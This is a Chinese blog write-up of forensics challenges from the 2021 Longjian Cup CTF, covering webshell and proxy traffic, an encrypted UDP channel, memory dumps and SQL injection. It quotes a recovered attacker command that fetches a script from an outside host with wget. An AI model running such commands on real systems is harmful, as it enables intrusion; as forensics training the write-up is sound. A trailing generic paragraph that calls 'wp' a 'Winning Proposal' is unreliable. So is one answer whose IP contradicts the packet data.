2021陇剑杯部分WP

写在前面的话,结局排名离谱,最后两分钟直接掉了70多名,排出100以外…很久没有打比赛了,但是也没想到国内的CTF环境已经差到这种地步了,另外就是题目都挺好,个别的题目暂时这里不给出解题过程,见谅

签到

操作内容:
看请求包,http请求返回403

Jwt

操作内容:

  1. 看cookie,jwt格式
  2. 找个在线解jwt的网站,将cookie解码,注意不要解登录失败那个,解登陆成功的
  3. 看流量包。alert(“root”)
  4. wireshark打开,包序号103 109这两个包,将文件都试下
  5. 包序号109,用echo写了个makefile,能看到so的名字
  6. 包序号 129,/etc/pam.d/common-auth

Webshell

操作内容:
3.1追踪tcp流,第5流得到密码
在这里插入图片描述

3.2黑客修改了一个日志文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)
追踪第31流的tcp流,然后看http报文,得到当前绝对路径,然后拼上这个log的名字
在这里插入图片描述

3.3黑客获取webshell之后,权限是______
查看whoami的返回结果,(不过一般猜也能猜到是www-data)
在这里插入图片描述

3.4黑客写入的webshell文件名是_____________。
后面访问的1.php即是webshell文件

在这里插入图片描述

3.5黑客上传的代理工具客户端名字是_____________。(如有字母请全部使用小写)
查看post内容,urldecode解码后,base64解码键为j680……的值的内容(根据代码内容,有一个substr,需要去除开头两个字符。)解码得到frpc.ini
在这里插入图片描述
在这里插入图片描述

3.6黑客代理工具的回连服务端IP是_____________。
3.7黑客的socks5的连接账号、密码是______。(中间使用#号隔开,例如admin#passwd)
十六进制解码键为xa5d……的值,得到所有信息,包括回连IP、回连端口、用户名、密码,代理插件等等

日志分析

操作内容:
1.看流量www.zip
在这里插入图片描述

  1. access.log,发现了写…/…/…/…/…/…/…//tmp/sess_car字段,判断文件/tmp/sess_car
  2. 读文件使用的类是SplFileObject

在这里插入图片描述

流量分析

操作内容:
分析pcap流量包,主机ip应该是172.18.0.1,可以看到很多UDP协议的包。在看包内容的时候,注意到UDP包头都是P05=,而且有的是有base64,也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00,其中00的长度是32、01的长度是16,可能是认证。

根据长度为16猜测可能是aes,用长度16的base64(即P05=后面是01 00 00 00的)作为aes key解密发现解密成功了,02 00 00 00对应的包里面都有一个可见字符,其中受害IP172.18.0.125有命令:wget http://147.182.251.98/d.sh;所以第一问为127.18.0.125,第二问密钥就是18217号包里的DtX0GScM9dwrgZht,第三问ip即为147.182.251.98(udp.stream eq 85)
在这里插入图片描述
在这里插入图片描述

内存分析

操作内容:
6.1 使用工具volatility(kali自带)
imageinfo指令获取系统信息
在这里插入图片描述

直接使用lsadump指令查看最后登录的用户
在这里插入图片描述

得到flag
flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

6.2

filescan 指令扫描文件
可以把输出内容保存到新文本文件中便于查看

找到HUAWEI P40
在这里插入图片描述

使用dumpfiles指令提取文件
在这里插入图片描述

Kali中可以直接从dat文件中解压得到备份数据包文件夹
在这里插入图片描述
在这里插入图片描述

打开发现为加密文件
在这里插入图片描述

查到可以使用华为的数据包解密工具
https://github.com/RealityNet/kobackupdec
使用指令python3 kobackupdec.py -vvv 密码 加密文件夹 解密存储目录
根据提示 密码为上题中的flag空格换成_
W31C0M3_T0_THiS_34SY_F0R3NSiCX
即可得到解密后的文件夹(此处为a)
在这里插入图片描述

解密文件位于 a\storage\MediaTar\images
打开images0.tar压缩包 得到图片flag

简单日志分析

操作内容:
1.2根据流量包
3 查看流量请求包的一段base64。编码 解码会发现进行了反弹shell操作

SQL注入

操作内容:

  1. 注入语句采用if语句,如果成功返回正常界面,bool盲注
  2. 找注数据库,表,字段的语句,取注入每位时的边界值,拼接
  3. 找注flag值的语句,取注入每位时的边界值,拼接。

WIFI

操作内容:

暂不放出

ios

操作内容:
1.通过查看内部ip192.168.1.8与外部3.128.156.159通信的流量
2.wget 发现了使用的工具
在这里插入图片描述

3.根据使用文档和流量可知密钥为hack4sec
在这里插入图片描述

4.一个个数的。。正则提取下就出来了。746558f3-c841-456b-85d7-d6c0f2edabb2
在这里插入图片描述

5.在之前看的时候就觉得有些许不对劲,到了第五题发现果然是个疑似扫描的东西,继续往下翻,到这里结束,得出10-499
在这里插入图片描述
在这里插入图片描述

6.暂不公布
7.查看ip192.168.1.8对内网的异常流量可以发现。
8.查看log文件,小马的参数即是密码

机密内存

操作内容:
暂不公布

  • 10
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
2021陇剑杯线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比赛和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常,比赛wp是指参赛者提出的在比赛中胜出的最佳方案。这种方案可能涉及各种因素,包括创新性、技术实施、解决问题的方法和效率等。具体来说,一个好的wp可能包括以下几个要素: 1. 题目分析:清晰理解比赛的题目和要求,明确问题的关键点和目标。 2. 解决方案:提出独特、创新和可行的解决方案,展示自己的技术和专业知识。 3. 实施计划:描述实施该方案的详细步骤和时间表,包括资源的分配和团队协作。 4. 风险分析:识别潜在的风险和挑战,并提供解决方法和备选方案。 5. 评估指标:明确关键的评估指标和成功的标准,展示方案的效果和可衡量的结果。 在许多比赛中,评委会或专家小组会对参赛者提交的wp进行评审,选出最佳的方案。一个优秀的wp将会体现出创新性、可行性和适应性。并且,一个优秀的方案通常能够提供有说服力的理由来解释为什么这个方案是最好的,以及为什么它比其他方案更优秀。 总的来说,2021陇剑杯线下赛wp是指在比赛中成功的方案,这个方案提供了创新、可行和有效的解决问题的方法,并且能够清晰地展示其技术和团队的能力。
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值